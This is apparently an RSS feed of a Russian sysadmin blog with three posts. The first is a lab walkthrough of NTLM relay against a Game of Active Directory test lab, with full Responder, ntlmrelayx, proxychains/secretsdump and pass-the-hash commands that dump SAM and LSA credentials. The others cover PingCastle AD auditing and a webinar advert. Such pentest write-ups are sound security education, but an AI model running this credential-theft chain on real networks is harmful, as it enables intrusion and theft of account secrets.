<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" version="2.0">

<channel>
	<title>Litl-Admin.ru</title>
	<atom:link href="https://litl-admin.ru/feed" rel="self" type="application/rss+xml"/>
	<link>https://litl-admin.ru</link>
	<description>Новый облик сообщества системных администраторов</description>
	<lastBuildDate>Fri, 18 Jul 2025 07:44:57 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.4</generator>
	<item>
		<title>Техника NTLMRelay – реальная имба на пентесте</title>
		<link>https://litl-admin.ru/xaking/texnika-ntlmrelay-realnaya-imba-na-penteste.html</link>
					<comments>https://litl-admin.ru/xaking/texnika-ntlmrelay-realnaya-imba-na-penteste.html#respond</comments>
		
		
		<pubDate>Wed, 22 Nov 2023 12:08:30 +0000</pubDate>
				<category><![CDATA[Хакинг]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7503</guid>

					<description><![CDATA[Всем привет. В ходе аудита информационной безопасности частенько (да в 100% случаев) сталкиваюсь с тем, что на сетевых узлах отключено требование обязательной цифровой подписи протокола SMB. Ну отключено и отключено, плохо конечно, но чем это чревато? И всё никак не удавалось продемонстировать последствия такого недостатка в дикой среде. Скажем так, описывать его дольше, чем просто [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Всем привет. В ходе аудита информационной безопасности частенько (да в 100% случаев) сталкиваюсь с тем, что на сетевых узлах отключено требование обязательной цифровой подписи протокола SMB. Ну отключено и отключено, плохо конечно, но чем это чревато?</p>
<p>И всё никак не удавалось продемонстировать последствия такого недостатка в дикой среде. Скажем так, описывать его дольше, чем просто прочекать. А тут вот всё-таки собрался с мыслями, собрал стенд из нескольких виртуалок и решил продемонстрировать. Тем более, что получилось очень показательно.</p>
<h2>Что за стенд</h2>
<p>В качестве стенда буду использовать сборку <a href="https://github.com/Orange-Cyberdefense/GOAD" target="_blank" rel="nofollow noopener">Game of Active Directory</a>. Скажу сразу &#8211; стенд очень прикольный, есть множество различных техник и потестить инструменты прям самое оно.</p>
<figure id="attachment_7504" aria-describedby="caption-attachment-7504" style="width: 620px" class="wp-caption aligncenter"><a href="https://litl-admin.ru/wp-content/uploads/2023/11/GOAD_schema.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" fetchpriority="high" decoding="async" class="wp-image-7504 size-medium" title="Принципиальная схема стенда" src="https://litl-admin.ru/wp-content/uploads/2023/11/GOAD_schema-620x316.png" alt="Принципиальная схема стенда" width="620" height="316" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/GOAD_schema-620x316.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/GOAD_schema-768x392.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/GOAD_schema.png 800w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="316"></span></a><figcaption id="caption-attachment-7504" class="wp-caption-text">Принципиальная схема стенда</figcaption></figure>
<p>Установить его &#8211; отдельный квест, я пол-дня мучился, пришлось даже апгрейд компьютера делать, но оно того стоило. Если нужно будет, в отдельном посте расскажу как его разворачивать.</p>
<p>Итак, погнали дальше.</p>
<h2>Как проверить требуется ли цифровая подпись пакетов или нет?</h2>
<p>Лично я проверяю через CrackMapExec &#8211; этот инструмент стал уже настолько привычным, что уже наверное занимает 1-ое место в рейтинге моих любимых hack tool.</p>
<p><code># crackmapexec smb 192.168.56.0/24</code></p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-06-09.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" decoding="async" class="aligncenter size-medium wp-image-7505" src="https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-06-09-620x123.png" alt="" width="620" height="123" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-06-09-620x123.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-06-09-940x186.png 940w, https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-06-09-768x152.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-06-09-1536x304.png 1536w, https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-06-09.png 1832w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="123"></span></a></p>
<p>Указываем целую подсеть и ищем упоминания (<em>signing:False</em>). В нашем стенде всего 5 серверов. Однако в организации, как правило, там будут десятки и сотни узлов. Теперь бы хорошо список IP-адресов с отключенной цифровой подписью сохранить в файлик для последующего использования.</p>
<p><code># crackmapexec smb 192.168.56.0/24 --gen-relay-list smb_sign_off.txt</code></p>
<p>У CrackMapExec существует отдельная опция, которая сохраняет найденные хосты с отключенной подписью в отдельный файл (в нашем случае &#8211; smb_sign_off.txt).</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-12-10.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" decoding="async" class="aligncenter size-medium wp-image-7506" src="https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-12-10-620x252.png" alt="" width="620" height="252" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-12-10-620x252.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-12-10-940x382.png 940w, https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-12-10-768x312.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-12-10.png 1165w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="252"></span></a></p>
<h2>В чём суть атаки</h2>
<p>Вспоминаем одну из статей, когда мы <a href="https://litl-admin.ru/xaking/sposoby-polucheniya-netntlmv2-xeshej-polzovatelej-cherez-obshhedostupnyj-setevoj-resurs.html" target="_blank" rel="nofollow noopener">ловили хеш NetNTLM в сети через Responder</a>. В общем виде напрямую использовать этот хеш через какой-нибудь <a href="https://litl-admin.ru/xaking/kak-poluchit-setevoj-dostup-k-windows-ot-imeni-drugogo-polzovatelya-ne-znaya-parolya.html" target="_blank" rel="nofollow noopener">Pass-the-Hash</a> нельзя, только восстанавливать методом перебора через <a href="https://litl-admin.ru/utility/rabota-s-programmoj-hashcat-hashcat-gui-oclhashcat.html" target="_blank" rel="nofollow noopener">Hashcat</a>.</p>
<p>Но скажем так, есть ещё один вариантик, в случае если отсутствует проверка подлинности отправителя (как раз цифровая подпись), можно перенаправить от своего имени хеш на целевую машину и выполнить произвольные действия от имени конкретного пользователя. Особенно уместно будет, если пользователь состоит в группе администраторов хотябы на каком-нибудь узле с отключенной проверкой цифровой подписи) На стенде как раз есть такая сборочка, но из опыта &#8211; в организациях тоже встречается нередко.</p>
<h2>Собираем связку Responder + NTLMRelay</h2>
<ol>
<li>Для начала убедимся, что нам вообще есть что там ловить) а именно, циркулируют ли широковещательные запросы разрешения имён. Для этого запустим resonder на прослушивание интерфейса.<br />
<code># responder -I eth1</code><br />
(где eth1 &#8211; интерфейс, смотрящий в корпоративную сеть)</p>
<blockquote class="danger"><p>Внимание, эта процедура в режиме &#8220;poisoning&#8221; может навести шороху в сети и вызвать проблемы с некоторыми сервисами)</p></blockquote>
<p>Должны через некоторое время увидеть что-то типа такого:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-24-56.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7507" src="https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-24-56-620x542.png" alt="" width="620" height="542" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-24-56-620x542.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-24-56-940x822.png 940w, https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-24-56-768x671.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/2023-11-22_22-24-56.png 1190w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="542"></span></a>Пролетел хеш NTLMv2 пользователя <em>NORTH\eddard.stark</em>. Мы можем уже повесить его на перебор, а можем&#8230;. (читать дальше).<br />
Вот что мне нравится в этом стенде &#8211; там на уровне запланированной задачи запрограммировано, что будет пролетать два хеша. Один &#8211; обычного пользователя, с легким паролем, который можно подобрать. Второй &#8211; с паролем юзера с правами админа, пароль сбрутить нереально. Так что долго ждать не придётся. Ну ладно, сейчас проведём атаку.</li>
<li>Отменяем респондер и идём в его конфиг: (<em>/usr/share/responder/Responder.conf</em>)<br />
<a href="https://litl-admin.ru/wp-content/uploads/2023/11/3.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7508" src="https://litl-admin.ru/wp-content/uploads/2023/11/3-620x563.png" alt="" width="620" height="563" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/3-620x563.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/3.png 647w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="563"></span></a>Нам нужно отключить запуск SMB и HTTP-серверов при старте. Чтобы не было конфликта с NTLMRelay. Сохраняем конфиг и идём дальше.</li>
<li>Далее я для удобства разобью консоль на три экрана &#8211; <a href="https://litl-admin.ru/linux/tmux-v-linux-konsolnyj-menedzher-okon-dlya-sisadmina.html" target="_blank" rel="nofollow noopener">при помощи tmux</a>.<br />
<a href="https://litl-admin.ru/wp-content/uploads/2023/11/4.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7509" src="https://litl-admin.ru/wp-content/uploads/2023/11/4-620x336.png" alt="" width="620" height="336" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/4-620x336.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/4-768x416.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/4.png 800w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="336"></span></a></li>
<li>В первом экране запустим NTLMRelayX из состава Impacket (сейчас уже есть &#8220;из коробки&#8221;, но можно <a href="https://github.com/fortra/impacket" target="_blank" rel="nofollow noopener">скачать с гитхаба</a>)<br />
<a href="https://litl-admin.ru/wp-content/uploads/2023/11/5.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7510" src="https://litl-admin.ru/wp-content/uploads/2023/11/5-620x586.png" alt="" width="620" height="586" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/5-620x586.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/5-768x725.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/5.png 937w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="586"></span></a><code># ntlmrelayx.py -tf smb_sign_off.txt -of hashes -smb2support -socks</code><br />
где <em>-tf</em> &#8211; путь к файлу целей (хосты с отключенной проверкой цифровой подписи), <em>-of</em> &#8211; выходной файлик, куда полетят хеши; <em>-socks</em> &#8211; режим проксирования, когда поднимается socks-сервер и через который можно перенаправлять запросы. Обратите внимание на каком порту он поднялся, я подвёл</li>
<li>Во втором окне стартуем Responder тот же самый, ожидаем захват хеша<br />
<code># responder -I eth1</code><br />
<a href="https://litl-admin.ru/wp-content/uploads/2023/11/6.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7511" src="https://litl-admin.ru/wp-content/uploads/2023/11/6-620x336.png" alt="" width="620" height="336" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/6-620x336.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/6-940x509.png 940w, https://litl-admin.ru/wp-content/uploads/2023/11/6-768x416.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/6.png 1024w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="336"></span></a></li>
<li>Когда хеш наконец пролетит, ntlmrelay проще говоря попробует прозрачно авторизоваться на каждой из целевых систем (в списке IP всего 2 станции), а также создаст socks-подключения к каждой из них, в случае успеха.<br />
<a href="https://litl-admin.ru/wp-content/uploads/2023/11/7.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7513" src="https://litl-admin.ru/wp-content/uploads/2023/11/7-620x336.png" alt="" width="620" height="336" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/7-620x336.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/7-940x509.png 940w, https://litl-admin.ru/wp-content/uploads/2023/11/7-768x416.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/7.png 1024w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="336"></span></a>Для проверки введём в окне ntlmrelayx команду &#8220;socks&#8221; и увидим куда можно проксироваться, под какой учётной записью и есть ли у нас права администратора:<br />
<a href="https://litl-admin.ru/wp-content/uploads/2023/11/8.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7514" src="https://litl-admin.ru/wp-content/uploads/2023/11/8-620x280.png" alt="" width="620" height="280" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/8-620x280.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/8-768x346.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/8.png 829w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="280"></span></a>Повезло! Есть одна админская учётка. Мы не знаем её пароль, только NTLMv2-хеш, который ещё нужно подобрать (но мы не будем). Также не сможем по NTLMv2 выполнить Pass-The-Hash. Но это и не надо.</li>
<li>Проксируемся! Для этого используем штатный proxychains, которые требуется чуток поднастроить.<br />
Открываем конфиг: <em>/etc/proxychains4.conf</em><br />
<a href="https://litl-admin.ru/wp-content/uploads/2023/11/9.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7515" src="https://litl-admin.ru/wp-content/uploads/2023/11/9.png" alt="" width="592" height="608" /><meta itemprop="width" content="592"><meta itemprop="height" content="608"></span></a>И прописываем там наш порт &#8211; в случае с ntlmrelayx &#8211; 1080 (я обводил на скрине выше). Ну ещё можно раскомментировать строчку quiet_mode, чтобы не моросили служебные сообщения в консоль. Я лично не люблю) Да, кстати, Responder уже можно выключить!</li>
<li>Проксируемся!<br />
<code># proxychains secretsdump.py -no-pass NORTH/EDDARD.STARK@192.168.56.22</code><br />
<a href="https://litl-admin.ru/wp-content/uploads/2023/11/10.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7516" src="https://litl-admin.ru/wp-content/uploads/2023/11/10-620x272.png" alt="" width="620" height="272" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/10-620x272.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/10-940x413.png 940w, https://litl-admin.ru/wp-content/uploads/2023/11/10-768x337.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/10.png 1355w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="272"></span></a>Если всё сделано правильно &#8211; вот нам и дамп SAM-базы пользователей, с NT-хешем локального администратора (вот его уже можно PtH-кнуть).<br />
Дальше DCC2-кеширование учётки (брутить смысла нет &#8211; слишком сложное шифрование, скорость будет &#8211; ну тока ТОП10к паролей проверить разве что.<br />
И ниже будет ещё дамп LSA-кредсов,<br />
<a href="https://litl-admin.ru/wp-content/uploads/2023/11/11.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7517" src="https://litl-admin.ru/wp-content/uploads/2023/11/11-620x294.png" alt="" width="620" height="294" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/11-620x294.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/11-940x446.png 940w, https://litl-admin.ru/wp-content/uploads/2023/11/11-768x364.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/11.png 1048w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="294"></span></a>Вон, даже пароль SPN-учётки &#8220;sql_svc&#8221; в открытом виде &#8211; пароль длиннющий, перебрать невозможно будет. Кстати, не помню, писал ли про SPN-учётки или нет, но напишу. Механизм &#8211; огонь!</li>
<li>Всё, точка уже хакнута &#8211; есть права админа. Кроме secretsdump можно использовать и другие утилиты, тот же lsassy, donpapi и т.д. Всё, где можно авторизоваться.</li>
</ol>
<p>Проверил вот Pass-the-Hash через CrackMapExec &#8211; сработало) Драгоценная &#8220;Pwn3d!&#8221; ) Можно почудить.<a href="https://litl-admin.ru/wp-content/uploads/2023/11/12.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7518" src="https://litl-admin.ru/wp-content/uploads/2023/11/12-620x121.png" alt="" width="620" height="121" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/12-620x121.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/12-940x184.png 940w, https://litl-admin.ru/wp-content/uploads/2023/11/12-768x150.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/12.png 1343w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="121"></span></a></p>
<p>Вот такая вот история. Надеюсь, было хоть немного, но интересно!</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/xaking/texnika-ntlmrelay-realnaya-imba-na-penteste.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Поиск уязвимостей в Active Directory с помощью PingCastle</title>
		<link>https://litl-admin.ru/xaking/poisk-uyazvimostej-v-active-directory-s-pomoshhyu-pingcastle.html</link>
					<comments>https://litl-admin.ru/xaking/poisk-uyazvimostej-v-active-directory-s-pomoshhyu-pingcastle.html#respond</comments>
		
		
		<pubDate>Thu, 09 Nov 2023 00:41:41 +0000</pubDate>
				<category><![CDATA[Хакинг]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7489</guid>

					<description><![CDATA[Давно не писал ничего. Вот кстати, может кому полезно будет &#8211; есть инструмент для тестирования своей Active Directory на уязвимости и небезопасные настройки. Инструмент называется PingCastle, больше полезен тем, кто знает английский язык, ибо результаты работы написаны в основном на нём. Но это не беда, ведь в техническом английском все слова из C++ Отчасти механизм [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Давно не писал ничего. Вот кстати, может кому полезно будет &#8211; есть инструмент для тестирования своей Active Directory на уязвимости и небезопасные настройки.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/11/la1.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7491" src="https://litl-admin.ru/wp-content/uploads/2023/11/la1.png" alt="" width="449" height="297" /><meta itemprop="width" content="449"><meta itemprop="height" content="297"></span></a></p>
<p>Инструмент называется <a href="https://github.com/vletoux/pingcastle" target="_blank" rel="nofollow noopener"><strong>PingCastle</strong></a>, больше полезен тем, кто знает английский язык, ибо результаты работы написаны в основном на нём. Но это не беда, ведь в техническом английском все слова из C++ <img src="https://litl-admin.ru/wp-content/themes/root/images/smilies/smile.png" alt=":-)" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Отчасти механизм похож на <a href="https://litl-admin.ru/xaking/puti-ataki-na-activedicrectory-pri-pomoshhi-bloodhound.html" target="_blank" rel="noopener">Bloodhound</a>, о котором я уже писал. И скоро будет ещё один материал &#8211; немного подразобрался, инструмент реально занятный.</p>
<p>С документацией можно ознакомиться на <a href="https://www.pingcastle.com/" target="_blank" rel="nofollow noopener">официальном сайте</a>, а мы сейчас разберём базовый пример.</p>
<p>Итак, предположим, что программу уже скачали себе на компьютер. Теперь возможны два варианта. В первом случае &#8211; мы сторонний пентестер, работаем со своего ноутбука.</p>
<p>Запустить приложение нужно от имени существующего пользователя (поэтому нам потребуется хотябы одна пользовательская учётная запись).</p>
<h2>Как запустить командную строку от имени пользователя?</h2>
<p>Для начала убедимся, что на просмотр сетевых ресурсов контроллера домена у нас не хватает прав (мы со своего устройства &#8211; &#8220;неавторизованный пользователь&#8221;).</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/11/la2.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7492" src="https://litl-admin.ru/wp-content/uploads/2023/11/la2-620x313.png" alt="" width="620" height="313" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/la2-620x313.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/la2.png 677w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="313"></span></a></p>
<p>Далее, запускаем командную строку от имени доменного пользователя:</p>
<p><code>C:\ runas /user:<em>login</em>@<em>domain</em> /noprofile /netonly cmd.exe</code></p>
<p>Вводим пароль этого пользователя и у нас открывается новое окно cmd.exe, в заголовке которого виднеется информация, что запущена она от имени login@domain.</p>
<p>В нём же можно проверить снова командой net view видимость сетевых ресурсов на Domain Controller &#8211; в этом случае результат уже другой:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/11/scr2.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7493" src="https://litl-admin.ru/wp-content/uploads/2023/11/scr2.png" alt="" width="596" height="475" /><meta itemprop="width" content="596"><meta itemprop="height" content="475"></span></a></p>
<p>Следующий шаг, а также если мы действуем как пользователь домена &#8211; запуск непосредственно PingCastle:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/11/la3.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7494" src="https://litl-admin.ru/wp-content/uploads/2023/11/la3-620x307.png" alt="" width="620" height="307" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/la3-620x307.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/la3.png 670w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="307"></span></a>Стрелками и нажатием кнопки Enter выбираем интересующий нас пункт. Для нас сейчас интересен &#8220;1-healthcheck&#8221;.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/11/la4.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7496" src="https://litl-admin.ru/wp-content/uploads/2023/11/la4-620x313.png" alt="" width="620" height="313" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/la4-620x313.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/la4.png 677w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="313"></span></a></p>
<p>Далее вводим имя домена для сканирования и дожидаемся результатов. Результаты по умолчанию вываливаются в тот же каталог в виде HTML-отчёта:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/11/rep1.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7497" src="https://litl-admin.ru/wp-content/uploads/2023/11/rep1-620x504.png" alt="" width="620" height="504" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/rep1-620x504.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/rep1-940x764.png 940w, https://litl-admin.ru/wp-content/uploads/2023/11/rep1-768x624.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/rep1.png 1150w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="504"></span></a>Вообще отчёт ооочень длинный, можно разворачивать разделы и читать описания выявленных недостатков:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/11/rep2.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7498" src="https://litl-admin.ru/wp-content/uploads/2023/11/rep2-620x498.png" alt="" width="620" height="498" srcset="https://litl-admin.ru/wp-content/uploads/2023/11/rep2-620x498.png 620w, https://litl-admin.ru/wp-content/uploads/2023/11/rep2-940x754.png 940w, https://litl-admin.ru/wp-content/uploads/2023/11/rep2-768x616.png 768w, https://litl-admin.ru/wp-content/uploads/2023/11/rep2.png 1160w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="498"></span></a>Я думаю, что не лишним будет пробежаться по основным пунктам и прикрыть то, что несложно прикрыть. Ведь злоумышленники обычно действуют примерно по такому же принципу &#8211; ищут то, что забыл сделать администратор и пролезают в эту дырочку.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/xaking/poisk-uyazvimostej-v-active-directory-s-pomoshhyu-pingcastle.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Приглашение на вебинар от ИКС</title>
		<link>https://litl-admin.ru/novosti/priglashenie-na-vebinar-ot-iks.html</link>
					<comments>https://litl-admin.ru/novosti/priglashenie-na-vebinar-ot-iks.html#respond</comments>
		
		
		<pubDate>Thu, 12 Oct 2023 09:16:17 +0000</pubDate>
				<category><![CDATA[Новости]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7477</guid>

					<description><![CDATA[Приветствую, коллеги! Несмотря на то, что давно не публиковал материалы, хочу начать всё-таки с тематического поста (на тему ИБ), а не размышлений о том где пропадал и что делал) На сайте уже публиковалась уже статья про Интернет контроль сервер: Приятно видеть, что отечественное программное обеспечение укрепляется на рынке инфобеза, что подталкивает к развитию всю отрасль. [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Приветствую, коллеги! Несмотря на то, что давно не публиковал материалы, хочу начать всё-таки с тематического поста (на тему ИБ), а не размышлений о том где пропадал и что делал)</p>
<p>На сайте уже публиковалась уже статья про Интернет контроль сервер:</p>
<div style="clear:both; margin-top:0em; margin-bottom:1em;"><a href="https://litl-admin.ru/freebsd/internet-kontrol-server-iz-reestra-otechestvennogo-po.html" target="_blank" class="IRPP_minimalist"><style> .IRPP_minimalist { padding:0px; margin: 0; padding-top:1em!important; padding-bottom:1em!important; width:100%; display: block; font-weight:bold; background-color:#eaeaea; border:0!important; border-left:4px solid #34495E!important; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); -moz-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); -o-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); -webkit-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); text-decoration:none; } .IRPP_minimalist:active, .IRPP_minimalist:hover { opacity: 1; transition: opacity 250ms; webkit-transition: opacity 250ms; text-decoration:none; } .IRPP_minimalist { transition: background-color 250ms; webkit-transition: background-color 250ms; opacity: 1; transition: opacity 250ms; webkit-transition: opacity 250ms; } .IRPP_minimalist .ctaText { font-weight:bold; color:inherit; text-decoration:none; font-size: 16px; } .IRPP_minimalist .postTitle { color:#000000; text-decoration: underline!important; font-size: 16px; } .IRPP_minimalist:hover .postTitle { text-decoration: underline!important; } </style><div style="padding-left:1em; padding-right:1em;"><span class="ctaText">Читать подробнее: </span>&nbsp; <span class="postTitle">Интернет-Контроль-Сервер из реестра отечественного ПО</span></div></a></div>
<p>Приятно видеть, что отечественное программное обеспечение укрепляется на рынке инфобеза, что подталкивает к развитию всю отрасль.</p>
<p>Так вот, эти ребята запланировали вебинар на тему &#8220;<a href="https://xserver.a-real.ru/vebinars/iks-ngfw-reshenie-dlya-migratsii-i-obespecheniya-informatsionnoy-bezopasnosti" target="_blank" rel="nofollow noopener sponsored"><strong>ИКС &#8211; NGFW-решение для миграции и обеспечения информационной безопасности</strong></a>&#8220;. Если есть возможность &#8211; обратите внимание. Мероприятие бесплатное. Будет розыгрыш подарков, вкусные условия для приобретения лицензий и многое другое!</p>
<p>Во время вебинара мы с вами также:</p>
<ol>
